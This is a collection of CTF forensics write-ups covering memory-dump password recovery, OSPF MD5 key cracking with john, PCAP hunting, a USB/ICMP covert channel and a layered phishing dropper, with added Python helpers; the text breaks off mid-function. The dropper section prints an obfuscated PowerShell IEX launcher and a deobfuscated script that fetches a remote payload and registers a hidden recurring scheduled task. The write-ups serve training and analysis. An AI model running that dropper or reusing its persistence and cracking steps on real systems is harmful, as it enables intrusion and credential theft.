Forensics Challenges
Secret Password Stash
I've created the best system for storing all my top-secret information. Hackers can't steal my secrets if I store them in a virtual machine, right? Unfortunately, I accidentally deleted the virtual machine. Oops! Luckily, I saved a memory capture. Can you help me recover my lost passwords?
The flag will be in format - uCTF{flag}
The first thing I had to do was extract the archive with 7z x memory.7z, which blew up from 270MB to a gigabyte. Then since this is memory, my first thought was to spin up Volatility3, but I decided to go through some initial triage steps before jumping in:
-
strings -e l memory.dmp > secret_password_stash_strings.log
A pre-Volatility step, always a good one to take to get a fair idea of what the data you're working with contains before doing a deep dive. The -e l flag pulls 16-bit little-endian strings, which is how Windows stores most of its paths in memory; a plain strings run alongside it catches the ASCII ones. Looking at the log, one thing that caught my attention and appeared multiple times is C:\Users\admin\Desktop\note_to_self.txt. One of the times, on line 527,696, it appeared next to a Password Safe.lnk, which is a Windows shortcut rather than a file of its own, so it is more a hint at which application is involved than a second file to recover. Continuing to parse through, we can see one of the occurrences by \Device\HarddiskVolume2\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\super_secret_passwords.psafe3.lnk (the Recent folder holds shortcuts to recently opened files, and each .lnk records the target's full path). Eventually we find the true path for this as C:\Users\admin\Documents\My Safes\super_secret_passwords.psafe3, and a backup at C:\Users\admin\Documents\My Safes\super_secret_passwords_001.ibak. I think we have enough information to have a good idea of where to start looking with Volatility.
-
./vol.py -f memory.dmp windows.filescan | grep passwords
When I ran the plain filescan command, there were a TON of results, so I decided to filter it down to the files that we know we are interested in. We got the file offsets from this:
0x3e1745d0 100.0 \Users\admin\Documents\My Safes\super_secret_passwords.psafe3 216
0x3fc36070 \Users\admin\Documents\My Safes\super_secret_passwords.plk 216
0x3fe1d8f0 \Users\admin\Documents\My Safes\super_secret_passwords_001.ib 216
And we can also go ahead and get the offset for the note_to_self.txt file with the same technique while we're at it:
0x3e054f20 100.0 \Users\admin\AppData\Roaming\Microsoft\Windows\Recent\note_to_self.lnk 216
0x3fc6c180 \Users\admin\Desktop\note_to_self.txt 216
-
./vol.py -f memory.dmp -o ./dumped_files windows.dumpfiles.DumpFiles --physaddr 0x3e1745d0
Also ran it with offset 0x3fc6c180 to get the note and 0x3fc36070 in case the .psafe3 wasn't the only useful file. The note to self just had the text thequickbrownfoxjumpedoverthelazydog, a pangram typically used for testing a font since it has every letter of the alphabet in it. The .psafe3 file looks like gibberish, so it is either corrupted or encrypted, and the string in the note may be the password we're looking for. A quick sanity check before installing anything: a Password Safe V3 database starts with the four ASCII bytes PWS3, so if the dumped file begins with that tag it survived the dump intact and what we are looking at is encryption, not corruption.
I grabbed the relevant software from Password Safe, opened the .psafe3 file, and entered the password, and we got the flag!
Answer: uCTF{Suppa_secret_pa$$word}
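If you would rather test the candidate password offline than install Password Safe on the analysis box, the file header is enough. This is an added example, not code from the write-up or from Password Safe: it parses the V3 header (TAG, SALT, ITER, H(P')), performs the format's SHA-256 key stretching, and compares. The sample safe it builds is constructed here for a known passphrase and stands in for the dumped .psafe3; the real file would be read with open(..., "rb").

```python
import hashlib
import hmac
import os
import struct

# Start of a Password Safe V3 (.psafe3) file, per the format's own specification:
#   TAG    4 bytes   ASCII "PWS3"
#   SALT  32 bytes
#   ITER   4 bytes   little-endian key-stretching iteration count
#   H(P') 32 bytes   SHA-256 of the stretched key P'
# Everything after that is Twofish-encrypted, so this header is all that is
# needed to test a candidate master password offline.
HEADER_LEN = 4 + 32 + 4 + 32


def stretch_key(passphrase: bytes, salt: bytes, iterations: int) -> bytes:
    """P' = X_ITER, where X_0 = SHA256(passphrase || SALT) and X_j = SHA256(X_{j-1})."""
    x = hashlib.sha256(passphrase + salt).digest()
    for _ in range(iterations):
        x = hashlib.sha256(x).digest()
    return x


def parse_header(blob: bytes):
    """Return (salt, iterations, stored_hash); raise if the blob is not a V3 safe."""
    if len(blob) < HEADER_LEN or blob[:4] != b"PWS3":
        raise ValueError("not a Password Safe V3 database (missing PWS3 tag)")
    salt = blob[4:36]
    (iterations,) = struct.unpack("<I", blob[36:40])
    return salt, iterations, blob[40:72]


def check_passphrase(blob: bytes, passphrase: str) -> bool:
    """True when SHA256(P') for this passphrase equals the stored H(P')."""
    salt, iterations, stored = parse_header(blob)
    candidate = hashlib.sha256(stretch_key(passphrase.encode(), salt, iterations)).digest()
    return hmac.compare_digest(candidate, stored)


def build_sample_safe(passphrase: str, iterations: int = 2048) -> bytes:
    """Constructed stand-in for the dumped file: a valid header plus dummy ciphertext."""
    salt = os.urandom(32)
    stored = hashlib.sha256(stretch_key(passphrase.encode(), salt, iterations)).digest()
    return b"PWS3" + salt + struct.pack("<I", iterations) + stored + os.urandom(64)


if __name__ == "__main__":
    # For a real dump: safe = open("super_secret_passwords.psafe3", "rb").read()
    safe = build_sample_safe("thequickbrownfoxjumpedoverthelazydog")
    for guess in ("password", "thequickbrownfoxjumpedoverthelazydog"):
        print(f"{guess!r}: {check_passphrase(safe, guess)}")
```

Because ITER is read from the file (Password Safe uses at least 2048), a wordlist run against this header is deliberately slow per guess; that is the point of the stretching, and also why a note left on the desktop beats brute force here.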
Crack my OSPF
You’ve been tasked with auditing the network at Big Corporation. We need you to obtain the OSPF authentication key being used by the router with the router ID of 172.31.2.56
The flag is simply the cleartext key
If the download here doesn't work (it's a BIG file for CTFd), you can download from http://files.dataspot.space/all.7z
First step is extracting the all.7z file, which gives us a 950MB all.pcap file. Goodie goodie!
The first thing I tried to do was use ip.addr == 172.31.2.56 as a filter to ensure we were only looking at relevant packets, but there were no hits. That makes sense in hindsight: an OSPF router ID is a 32-bit value written in dotted-quad form, but it does not have to be an address the router actually sends from. Next I used ospf as a filter, and that one had more luck. To filter down to the router of interest, we can use ospf.srcrouter == 172.31.2.56.
I then followed the instructions for OSPFMD5Crack, which were:
-
Export the filtered traffic to a .pcap file
-
ettercap -Tqr ./all/ospf.pcap > raw-hashes.txt
Be sure to have the PCAP file saved as a .pcap, because the Ettercap tool doesn't work with the .pcapng file format.
-
cat raw-hashes.txt | cut -d ":" -f 2 >> net-md5-hashes.txt
-
john net-md5-hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
You may need to do sudo gunzip /usr/share/wordlists/rockyou.txt.gz if you are on a new Kali instance and haven't extracted the rockyou wordlist yet. To show the cracked passwords again later, do john --show net-md5-hashes.txt.
Answer: missingyou
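What john is actually doing here is worth seeing once in plain code. OSPF cryptographic authentication (AuType 2, RFC 2328 Appendix D) appends MD5(packet || key) to each packet, with the key zero-padded to 16 bytes, so anyone holding the capture can test candidate keys offline. The following is an added example, not part of the write-up or of OSPFMD5Crack: it builds a constructed Hello with a known key (the router ID and key match the challenge, the rest of the packet is made up), emits the $netmd5$<packet>$<digest> line that John's net-md5 format reads, and cracks it against a tiny inline wordlist.

```python
import hashlib
import struct

KEY_LEN = 16  # RFC 2328 Appendix D: the key is 16 bytes; a shorter key is zero-padded


def ospf_md5_digest(packet: bytes, key: bytes) -> bytes:
    """AuType 2 digest: MD5 over the OSPF packet (header + body) followed by the 16-byte key."""
    return hashlib.md5(packet + key[:KEY_LEN].ljust(KEY_LEN, b"\x00")).digest()


def dotted(addr: str) -> bytes:
    return bytes(int(o) for o in addr.split("."))


def build_hello(router_id: str, area_id: str, key_id: int, seq: int, key: bytes) -> bytes:
    """Constructed OSPFv2 Hello (not from the challenge capture) with cryptographic auth."""
    body = struct.pack("!4sHBBI", dotted("255.255.255.0"), 10, 0x02, 1, 40)  # mask, hello, opts, prio, dead
    body += b"\x00" * 8  # DR and BDR unset; no neighbours listed
    length = 24 + len(body)  # header + body; the trailing digest is not counted
    # With AuType 2 the checksum is 0 and the 64-bit auth field carries
    # 0x0000, key id, auth data length (16) and the cryptographic sequence number.
    header = struct.pack("!BBH4s4sHH", 2, 1, length, dotted(router_id), dotted(area_id), 0, 2)
    header += struct.pack("!HBBI", 0, key_id, KEY_LEN, seq)
    packet = header + body
    return packet + ospf_md5_digest(packet, key)


def split_packet(raw: bytes):
    """Use the header length field to separate the authenticated bytes from the digest."""
    length = struct.unpack("!H", raw[2:4])[0]
    return raw[:length], raw[length:length + KEY_LEN]


def john_line(raw: bytes) -> str:
    """The $netmd5$<packet hex>$<digest hex> form that John's net-md5 format reads."""
    packet, digest = split_packet(raw)
    return f"$netmd5${packet.hex()}${digest.hex()}"


def crack(raw: bytes, wordlist):
    """Return the first candidate whose digest matches, or None."""
    packet, digest = split_packet(raw)
    for word in wordlist:
        if ospf_md5_digest(packet, word.encode()) == digest:
            return word
    return None


if __name__ == "__main__":
    captured = build_hello("172.31.2.56", "0.0.0.0", 1, 0x5F000000, b"missingyou")
    print(john_line(captured))
    print("key:", crack(captured, ["password", "cisco", "missingyou"]))
```

Two things this makes obvious that the tooling hides: the cryptographic sequence number only stops replay, it adds nothing against offline guessing, and because the key is zero-padded, "missingyou" and "missingyou\x00\x00" are the same key.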
Stolen Flights
No story to this one...just need the password for "Tom Fedder"
The first thing I did upon opening the PCAP was search for frame contains "Tom" and frame contains "Fedder", neither of which had any hits. Next I filtered to http and saw a lot of good traffic, so my guess is that's the protocol of interest in this challenge.
The first interesting HTTP traffic was in packet 783, because it was to https://boardreader.com/. Before going any further, the OCSP traffic was just noise that I am not interested in, so I changed the active filter to http and not ocsp to further narrow down the search space. I then expanded it to http and not ocsp and not http.host contains "ocsp" to remove additional OCSP traffic from the results.
I decided to start looking at the cookies in the Baidu traffic, but initially wasn't able to make any sense of the cookie pairs. But there is a file called every_cookie_4644b13.js in packet 50,752 that looks like it might be able to explain it to us, so I went ahead and exported the file and made it pretty. After formatting and giving it a thorough read, I didn't see anything that was going to get us useful information out of the cookie pairs, so I moved on.
Trying frame contains "pass" in case there were any "password" or "passwd" strings didn't yield anything super interesting, except possibly tcp.stream eq 633. Following the HTTP stream shows a good bit of data transfer, most of it appearing to be related to Baidu's website.
I tried filtering down to http.cookie to only look at the traffic that would potentially have authentication-related information...
It's In There Somewhere...
This one is layered like that cake at Cheesecake Factory....
the flag will be in the format: HTB{flag}
The first thing I noticed is that this challenge looks exactly like one I worked on this past weekend in the HTB Business CTF! Unfortunately I didn't get around to solving the final stint of that challenge... but I did find a write-up that went over the last bit of methodology for it!
These are the steps I took to solve this challenge (all of it in an isolated VM with no network, since the chain ends in a live dropper):
-
Open the .eml file in Outlook and save the attachment
-
Open the attachment and a .zip file will automatically download
-
Extract the JavaScript file from the .zip archive
-
Run the JavaScript and print the value of the variable hfhwsgmb after the line hfhwsgmb = uwetjyhi.replace(/[sV]/g,'')
-
Paste the result in CyberChef and decode it as hex
-
Scroll down to the definition of ynvjonvw and add console.log(ynvjonvw) right after, then run the code in console
-
Get the PowerShell command from the variable:
PoweRShElL -EXEcU byPAss 'IEx(NEW-oBJeCT SYsTeM.iO.COmpResSion.dEfLaTestReAm( [SySTem.IO.meMOrYStReAm] [convert]::FromBase64String(''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''),[SyStEM.IO.COMPreSSION.cOMPRessIONmodE]::DECOMPReSS)| FOrEach{NEW-oBJeCT iO.sTReAMREaDEr( $_,[SYsTeM.TExt.eNcodiNg]::AsCii ) } ).reaDTOEnd( )'
-
Decode the PowerShell (base64, then Deflate) with the following, which inflates the blob without executing it:
$base64data = "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"
$data = [System.Convert]::FromBase64String($base64data)
$ms = New-Object System.IO.MemoryStream
$ms.Write($data, 0, $data.Length)
$ms.Seek(0,0) | Out-Null
$sr = New-Object System.IO.StreamReader(New-Object System.IO.Compression.DeflateStream($ms, [System.IO.Compression.CompressionMode]::Decompress))
while ($line = $sr.ReadLine()) { $line }
-
Decode the result of the command by printing the value of the variable EUMLmXNYuGSWAb. The inflated script, with debugging Write-Host lines added before the part that would actually register the scheduled task, is
:SET-ItEM ("VAr"+"Ia"+"B"+"le:4z0") ([TypE]("{2}{3}{1}{0}" -f'odinG','.enC','sYSTEm.T','ext') ) ; sv IgF ( [TypE]("{1}{0}{2}{3}" -f'OnVe','SYsTEM.c','r','T') ) ;sV ('5EV'+'lS') ([type]("{1}{2}{0}" -F 'E','Io','.fIL')) ; &("{4}{1}{3}{0}{2}"-f 'ri','et-','ctMode','St','S') -Version 2 function UYc`xq (${TN`me},${Chk`go`Iul}) { for (${eum`lMx`NyUg} = 0; ${eu`mL`MxNYug} -lt ${T`NME}."c`OUnt"; ${Eu`MLMx`NyUG}++) { ${T`NME}[${eUM`lM`XnyuG}] = (${t`NmE}[${eUm`Lmx`N`yuG}] -bxor ${c`HKGo`iUl}) } return ( gEt-vaRIAble ("4"+"Z0") -VaL)::"As`Cii"."gETs`T`RIng"(${tN`Me}) } function Rc`DAt`CaJT {return (1..16 | .('%'){ '{0:X}' -f (&("{0}{2}{1}" -f 'Ge','andom','t-R') -Max 16) }) -join ''} ${E`UM`lm`XNy`UGzzOO} = (&("{0}{1}" -f 'UyC','xq') ([System.Byte[]] @(0x0a,0x16,0x16,0x12,0x58,0x4d,0x4d,0x11,0x16,0x0d,0x0e,0x07,0x0c,0x12,0x0e,0x03,0x0c,0x11,0x4c,0x0a,0x16,0x00,0x4d,0x10,0x4d)) 98) ${suQ`QsIgl} = (.("{1}{0}" -f 'Cxq','Uy') ([System.Byte[]] @(0x31,0x3c,0x36)) 80) ${X`s`xnap`VE} = (&("{1}{0}"-f'xq','UyC') ([System.Byte[]] @(0x42,0x13,0x7d,0x4c,0x4c,0x78,0x5d,0x48,0x5d,0x13,0x70,0x53,0x5f,0x5d,0x50,0x13,0x71,0x55,0x5f,0x4e,0x53,0x4f,0x53,0x5a,0x48,0x13,0x6b,0x55,0x52,0x58,0x53,0x4b,0x4f,0x13,0x6c,0x53,0x4b,0x59,0x4e,0x6f,0x54,0x59,0x50,0x50,0x13)) 60) &('cd') ${XSx`NAp`Ve} ${cyR`YX`whqM} = (.("{1}{2}{0}" -f 't','R','cDATCAJ'))+(.("{0}{1}"-f 'UyC','xq') ([System.Byte[]] @(0x67,0x3f,0x2b,0x3a)) 73) ${N`yNG} = (.("{1}{0}" -f 'd','pw')).("{0}{1}{2}" -f 'ToStr','i','ng').Invoke() + '\' + ${cyRYXw`H`qM} ${WbwM`g`QB} = (.("{2}{1}{0}"-f 'Jt','TCA','RcDA')) + (.("{3}{1}{2}{0}" -f'Jt','AT','CA','RcD')) ${u`JRW} = $(.("{0}{1}" -f 'whoa','mi')) ${EUMLmX`NYuGS`WAb`lOEP} = (.("{1}{0}"-f'yCxq','U') ([System.Byte[]] 
@(0x5d,0x7d,0x45,0x3d,0x4d,0x42,0x60,0x50,0x5d,0x37,0x4e,0x74,0x67,0x4c,0x55,0x71,0x55,0x5c,0x4e,0x6a,0x60,0x53,0x35,0x68,0x66,0x6a,0x56,0x7e,0x4f,0x40,0x45,0x74,0x47,0x6a,0x4a,0x68,0x60,0x47,0x46,0x7e,0x4d,0x40,0x34,0x63,0x55,0x37,0x4e,0x68,0x5d,0x5c,0x56,0x68,0x50,0x36,0x4e,0x75,0x5e,0x53,0x4a,0x34,0x4f,0x47,0x4e,0x5c,0x51,0x36,0x4a,0x7d,0x65,0x5c,0x46,0x34,0x48,0x68,0x4a,0x6b,0x5e,0x53,0x7c,0x77,0x4d,0x6d,0x6f,0x4f,0x67,0x7d,0x31,0x57,0x60,0x53,0x30,0x63,0x4d,0x6a,0x46,0x72,0x60,0x36,0x52,0x7d,0x67,0x36,0x6c,0x68,0x66,0x43,0x73,0x71,0x5e,0x5c,0x6c,0x68,0x4d,0x47,0x35,0x68,0x61,0x43,0x52,0x6e,0x4d,0x43,0x4e,0x31,0x67,0x43,0x42,0x7e,0x67,0x7d,0x45,0x6d,0x4d,0x47,0x5d,0x63,0x5d,0x7d,0x73,0x73,0x47,0x63,0x39,0x39)) 4); ${r`ERbWtRv} = $igf::("{1}{3}{0}{2}{4}"-f 'ase64','From','Strin','B','g').Invoke(${eu`ml`MXny`UgsW`ABl`OEp}) (get-VariAbLe ('5EV'+'LS') -Va)::("{1}{2}{0}" -f'ytes','wri','teallb').Invoke(${N`ynG},${ReR`Bw`TRV}); ${as`kz`pH`UpAj} = (.("{0}{1}"-f'p','wd')).("{0}{1}{2}"-f'ToStr','in','g').Invoke() + '\' ${vQp`SBX`gyj} = (&("{3}{0}{2}{1}" -f 'cD','Jt','ATCA','R')) ${a`etR`sd`f} = (&("{2}{1}{0}" -f 'q', 'cx', 'UY') ([System.Byte[]] @(0x97,0x8b,0x9d,0xa4,0xb3,0xef,0xab,0xac,0x80,0xb0,0xb9,0x80,0xb3,0xeb,0x86,0xec,0xad,0xac,0x80,0xb6,0x91,0x80,0xab,0xb7,0xeb,0xab,0x80,0xee,0xa2)) 223) ${t`kqr`mLSfPD} = '"' + (&("{1}{0}"-f 'xq','UyC') ([System.Byte[]] @(0x22,0x2e,0x33,0x6b,0x63,0x22,0x3c,0x39,0x6b,0x66,0x3e,0x38,0x2e,0x29,0x6b)) 75) + "$eUmLmxNYuGZZoO$suqqSiGL/$vQpsbXGyj)" + '"' # Add your debugging code here, don't run the stuff below that will actually create the task! 
Write-Host "$aSKZpHuPaj$cyrYXWhqM" Write-Host ${t`kqr`mLSfPD} Write-Host ${a`etR`sd`f} ${eRQ`cf} = &("{1}{4}{3}{6}{2}{5}{0}"-f'TaskAction','New-S','le','e','ch','d','du') -Execute "$aSKZpHuPaj$cyrYXWhqM" -Argument ${Tk`Q`Rmls`FpD} ${tpNDJP`w`Aa} = .("{1}{2}{0}{4}{6}{3}{5}"-f'h','New-S','c','edTaskPrin','edu','cipal','l') "$UJrw" ${aIuf`d`yWasr} = .("{4}{1}{5}{2}{0}{3}" -f'igge','w-Sche','askTr','r','Ne','duledT') -Once -At (&("{0}{1}"-f 'Get-D','ate')).AddDays(1) -RepetitionInterval (&("{1}{2}{0}" -f'pan','New-Time','S') -Days 1) -RepetitionDuration (.("{1}{2}{3}{0}"-f'n','New-Ti','meS','pa') -Days(365)) ${d`wtTAWqx} = .("{5}{4}{0}{6}{1}{3}{2}" -f 'ledT','skS','ttingsSet','e','w-Schedu','Ne','a') -Hidden -MultipleInstances ("{0}{2}{1}" -f'Par','el','all') -AllowStartIfOnBatteries .("{2}{1}{3}{4}{6}{0}{5}"-f 'T','egis','R','ter-','Sche','ask','duled') -TaskName ${WbWm`g`Qb} -Action ${Er`qcf} -Trigger ${AI`Uf`dY`WASr} -Settings ${dW`TTAWqx}
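The last layer does not need to be run at all: every string in that script is a byte array passed through the UYcxq helper, which is a single-byte XOR followed by ASCII decoding. The decoder below is an added example, not part of the write-up or the malware; the byte arrays and keys are copied from the script above, and the role names (stage URL, drop directory and so on) are my reading of how the script uses each value, not names from the script.

```python
from typing import Optional


def xor_decode(data: bytes, key: int) -> str:
    """Equivalent of the script's UYcxq function: XOR every byte with key, decode as ASCII."""
    return bytes(b ^ key for b in data).decode("ascii")


# (XOR'd bytes, key) pairs copied from the deobfuscated script above.
# Role labels are assumptions about how the script uses each string.
ENCODED = {
    "stage_url": (bytes([0x0a, 0x16, 0x16, 0x12, 0x58, 0x4d, 0x4d, 0x11, 0x16, 0x0d, 0x0e, 0x07,
                         0x0c, 0x12, 0x0e, 0x03, 0x0c, 0x11, 0x4c, 0x0a, 0x16, 0x00, 0x4d, 0x10,
                         0x4d]), 98),
    "url_path": (bytes([0x31, 0x3c, 0x36]), 80),
    "drop_dir": (bytes([0x42, 0x13, 0x7d, 0x4c, 0x4c, 0x78, 0x5d, 0x48, 0x5d, 0x13, 0x70, 0x53,
                        0x5f, 0x5d, 0x50, 0x13, 0x71, 0x55, 0x5f, 0x4e, 0x53, 0x4f, 0x53, 0x5a,
                        0x48, 0x13, 0x6b, 0x55, 0x52, 0x58, 0x53, 0x4b, 0x4f, 0x13, 0x6c, 0x53,
                        0x4b, 0x59, 0x4e, 0x6f, 0x54, 0x59, 0x50, 0x50, 0x13]), 60),
    "drop_ext": (bytes([0x67, 0x3f, 0x2b, 0x3a]), 73),
    "flag": (bytes([0x97, 0x8b, 0x9d, 0xa4, 0xb3, 0xef, 0xab, 0xac, 0x80, 0xb0, 0xb9, 0x80,
                    0xb3, 0xeb, 0x86, 0xec, 0xad, 0xac, 0x80, 0xb6, 0x91, 0x80, 0xab, 0xb7,
                    0xeb, 0xab, 0x80, 0xee, 0xa2]), 223),
    "cmd_prefix": (bytes([0x22, 0x2e, 0x33, 0x6b, 0x63, 0x22, 0x3c, 0x39, 0x6b, 0x66, 0x3e,
                          0x38, 0x2e, 0x29, 0x6b]), 75),
}


def decode_all(encoded=ENCODED) -> dict:
    """Decode every (bytes, key) pair, keyed by role label."""
    return {name: xor_decode(data, key) for name, (data, key) in encoded.items()}


def find_flag(decoded: dict, prefix: str = "HTB{") -> Optional[str]:
    """Pick out the value shaped like the challenge flag, if any."""
    for value in decoded.values():
        if value.startswith(prefix) and value.endswith("}"):
            return value
    return None


if __name__ == "__main__":
    for name, value in decode_all().items():
        print(f"{name:>11}: {value!r}")
```

Reading the strings statically also surfaces what the task would have done: a scheduled task whose action is the decoded cmd_prefix followed by stage_url and url_path, writing its payload to drop_dir with the drop_ext extension. None of that has to execute to recover the flag.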
Answer: HTB{l0ts_of_l4Y3rs_iN_th4t_1} (500 points)
Deep Six
Another one with really no story behind it....just find the flag.
Flag will be in the format: CCT{flag}
When opening the PCAP, the first odd thing I notice is that the data protocol is USB, which I haven't had to work with before. So I Googled how to work with it and found these tips for how to get started.
My first step was to git clone https://github.com/carlospolop-forks/ctf-usb-keyboard-parser to my tools directory, then I attempted to extract the keystrokes from the PCAP via tshark:
tshark -r ./pcap1_v2.pcapng -Y 'usb.capdata && usb.data_len == 8' -T fields -e usb.capdata > usb-hex-commands.txt
Unfortunately for us, the output was blank! I tried converting our .pcapng to a .pcap and trying again, but no dice. I looked at the suggestions in this article and he said to skim the raw data, so I did that with the final large packet, and was able to see something right off the bat:
I tried looking for keystrokes with usb.transfer_type == 0x01 (interrupt transfers, which is what a HID keyboard uses) as suggested here, but there were no hits, so something else is going on here. In case it was easier than I was making it, I searched for frame contains "CCT", but unfortunately there were no hits.
One idea is to use usbrply to attempt to convert the binary data into Python commands, so I gave it a shot:
git clone https://github.com/JohnDMcMaster/usbrply.git
cd usbrply
sudo python setup.py install
usbrply --wrapper --device-hi -p pcap1_v2.pcapng > replay.py
But unfortunately it errored out with Exception: Failed to guess vid/pid: found 0 device entries. I made an issue on GitHub here to at least bring it to the author's attention, but I'm moving forwards without it.
Next I dug into what URB_BULK actually means: bulk transfers are the USB transfer type for large, non-time-critical data, which is how a mass-storage device moves file contents. So I tried the following tshark command to get all the data transferred in (endpoint direction 1 is IN, device to host):
tshark -r pcap1_v2.pcapng -Y 'usb.capdata and usb.endpoint_address.direction == 1' -T fields -e usb.capdata | tr -d '\n' > rawdata
I did that because I saw something similar used here, and we got access to the raw data! The next step is converting our hex data to binary:
sudo apt install xxd
xxd -r -p rawdata binarydata.bin
And we got the output, but it was mostly gibberish aside from a few mentions of pcap_chal.pcap again. I decided to give binwalk a go to see if we can carve out any files:
sudo binwalk -Me binarydata.bin --run-as=root
And it worked!
Inside the carved PCAP, I was able to extract an image from fotoforensics.com:
I tried uploading the image on FotoForensics to see if there was anything hidden in there, but the upload-file.php file was down or I was banned or something. I tried steghide extract -sf ./_binarydata.bin-0.extracted/fotoforensics.png to see if there was something embedded, but steghide doesn't work with .png images (it only handles JPEG, BMP, WAV and AU).
I tried doing a second binwalk on the PNG image with the following:
sudo binwalk -Me ./_binarydata.bin-0.extracted/fotoforensics.png --run-as=root
And it pulled out a 101KB .zlib file, which on a PNG is usually a false positive, since the image's own IDAT data is zlib-compressed. I tried to extract it anyway, just in case:
sudo apt install pigz
unpigz ./_binarydata.bin-0.extracted/_fotoforensics.png-0.extracted/3E.zlib
But no such luck. I reached out to one of the challenge creators to see if I was on the right track, but they told me the image was a red herring and that there was other traffic of interest in the PCAP that I should direct my attention to.
I decided to start clicking through all the TCP streams to see if there was anything noteworthy in them, to try to reduce the search space.
I did notice a lot of "Application Data" being transferred via the TLSv1.3 protocol (especially in stream 31), but since it's all encrypted, I don't think there's anything we can do with it.
TCP stream 52 had a password being passed in cleartext via IRC:
:irc.cct NOTICE Auth :*** Looking up your hostname...
CAP LS 302
PASS RedRoverRedRover$$
NICK zoobah
USER binaryphalanx 2 * :binaryphalanx
:irc.cct NOTICE Auth :*** Could not resolve your hostname: Request timed out; using your IP address (192.168.55.64) instead.
:irc.cct NOTICE Auth :Welcome to .Localnet.!
:irc.cct 001 zoobah :Welcome to the Localnet IRC Network zoobah!binaryphala@192.168.55.64
:irc.cct 002 zoobah :Your host is irc.cct, running version InspIRCd-2.0
:irc.cct 003 zoobah :This server was created on Debian
:irc.cct 004 zoobah irc.cct InspIRCd-2.0 iosw biklmnopstv bklov
:irc.cct 005 zoobah AWAYLEN=200 CASEMAPPING=rfc1459 CHANMODES=b,k,l,imnpst CHANNELLEN=64 CHANTYPES=# CHARSET=ascii ELIST=MU FNC KICKLEN=255 MAP MAXBANS=60 MAXCHANNELS=20 MAXPARA=32 :are supported by this server
:irc.cct 005 zoobah MAXTARGETS=20 MODES=20 NETWORK=Localnet NICKLEN=32 PREFIX=(ov)@+ STATUSMSG=@+ TOPICLEN=307 VBANLIST WALLCHOPS WALLVOICES :are supported by this server
:irc.cct 042 zoobah 108AAAAAC :your unique ID
:irc.cct 375 zoobah :irc.cct message of the day
:irc.cct 372 zoobah :- Welcome to the CCT Test Server for the PCAP assessment!
:irc.cct 376 zoobah :End of message of the day.
:irc.cct 251 zoobah :There are 1 users and 0 invisible on 1 servers
:irc.cct 254 zoobah 0 :channels formed
:irc.cct 255 zoobah :I have 1 clients and 0 servers
:irc.cct 265 zoobah :Current Local Users: 1 Max: 1
:irc.cct 266 zoobah :Current Global Users: 1 Max: 1
This also just so happened to be the only packet that showed up when I filtered on frame contains "CCT". I tried submitting both CCT{binaryphalanx} and CCT{RedRoverRedRover$$} as flags, but neither was correct.
I did a little OSINT and determined that Zoobah is likely the username of the person who created the challenge. Unfortunately, searching for "zoobah" + RedRoverRedRover didn't yield any results. We were able to determine that the challenge was pulled from this TryHackMe room, and from there could look up some additional strategies for solving the challenge.
The hint I found was something I had considered looking into earlier, but had forgotten about. Most standard ICMP traffic follows a similar format (a Linux ping fills its echo payload with an incrementing byte sequence, which is the run the filter below matches on), so anything that doesn't would be considered anomalous. So I wrote an ICMP filter to ignore the boilerplate packets and only show the ones that were anomalous:
icmp and !(data.data contains 101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f3031323334353637)
We can pivot off of the information we found and extract the content of the ICMP packets via tshark, filtering on the identifier the anomalous packets share:
tshark -r pcap_chal.pcap -Y "icmp and icmp.ident == 31337" -T fields -e data.data
But upon doing this, all the data is in hexadecimal format. So we can pipe the output to xxd to convert it to ASCII (the messages run together because the payloads contain no newlines):
$ tshark -r pcap_chal.pcap -Y "icmp and icmp.ident == 31337" -T fields -e data.data | xxd -r -p
bro, what you up to?n2mhwhy?you didn't send that thing yetoh... well, not over thisif not this, then what?let's use cryptcat insteadanother thing to install?man... no one can see thisstill... rather use encryptionwe need to pick a key to useI know just the oneAngela Bennett uses it to log into the Bethesda Naval HospitalWhat? Oh, that old thing?Hang on, lemme look it upokay, I found it. use the metasploit port to receivelistener is up. send it.okay, it's sent7181f4d45de00ae35b6cf8201c8d852bhash is good
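The same two ideas, "drop the stock ping pattern" and "collect payloads by ICMP identifier", in a self-contained form that does not depend on tshark. This is an added example, not from the write-up: a minimal classic-libpcap reader (pcapng is rejected, convert with editcap first), an IPv4/ICMP echo field extractor, and a collector that concatenates the non-stock payloads of one identifier in capture order. The capture it runs on is constructed inline with made-up addresses and messages; the identifier 31337 and the anomaly pattern are the ones from the challenge.

```python
import struct

# The 40-byte run 0x10..0x37 that the Wireshark filter above excludes: a Linux ping
# fills its echo payload with an incrementing byte sequence, so an echo packet whose
# payload lacks this run is "anomalous" and worth a look.
STANDARD_PATTERN = bytes(range(0x10, 0x38))
LINKTYPE_ETHERNET = 1


def is_stock_ping_payload(payload: bytes) -> bool:
    return STANDARD_PATTERN in payload


def iter_pcap_frames(pcap: bytes):
    """Yield (linktype, frame) from a classic libpcap file (pcapng is not handled here)."""
    magic = pcap[:4]
    if magic == b"\xd4\xc3\xb2\xa1":
        endian = "<"
    elif magic == b"\xa1\xb2\xc3\xd4":
        endian = ">"
    else:
        raise ValueError("not a libpcap capture; convert pcapng first (editcap -F pcap)")
    linktype = struct.unpack(endian + "I", pcap[20:24])[0]
    offset = 24
    while offset + 16 <= len(pcap):
        _, _, incl_len, _ = struct.unpack(endian + "IIII", pcap[offset:offset + 16])
        offset += 16
        yield linktype, pcap[offset:offset + incl_len]
        offset += incl_len


def icmp_echo_fields(frame: bytes, linktype: int):
    """(type, ident, seq, payload) for an IPv4 ICMP echo request/reply frame, else None."""
    l3 = frame[14:] if linktype == LINKTYPE_ETHERNET else frame  # else: treat as raw IPv4
    if len(l3) < 20 or l3[0] >> 4 != 4 or l3[9] != 1:   # IPv4 carrying protocol 1 (ICMP)
        return None
    ihl = (l3[0] & 0x0F) * 4
    total_len = struct.unpack("!H", l3[2:4])[0]
    icmp = l3[ihl:total_len]
    if len(icmp) < 8 or icmp[0] not in (0, 8):           # echo reply (0) or request (8)
        return None
    ident, seq = struct.unpack("!HH", icmp[4:8])
    return icmp[0], ident, seq, icmp[8:]


def extract_covert_data(pcap: bytes, ident: int) -> bytes:
    """Concatenate, in capture order, the payloads of non-stock echo packets with this ident."""
    chunks = []
    for linktype, frame in iter_pcap_frames(pcap):
        fields = icmp_echo_fields(frame, linktype)
        if fields is None:
            continue
        _, pkt_ident, _, payload = fields
        if pkt_ident == ident and not is_stock_ping_payload(payload):
            chunks.append(payload)
    return b"".join(chunks)


def build_sample_pcap(messages, ident: int = 31337) -> bytes:
    """Constructed capture: two stock pings (one using the covert ident, to show the
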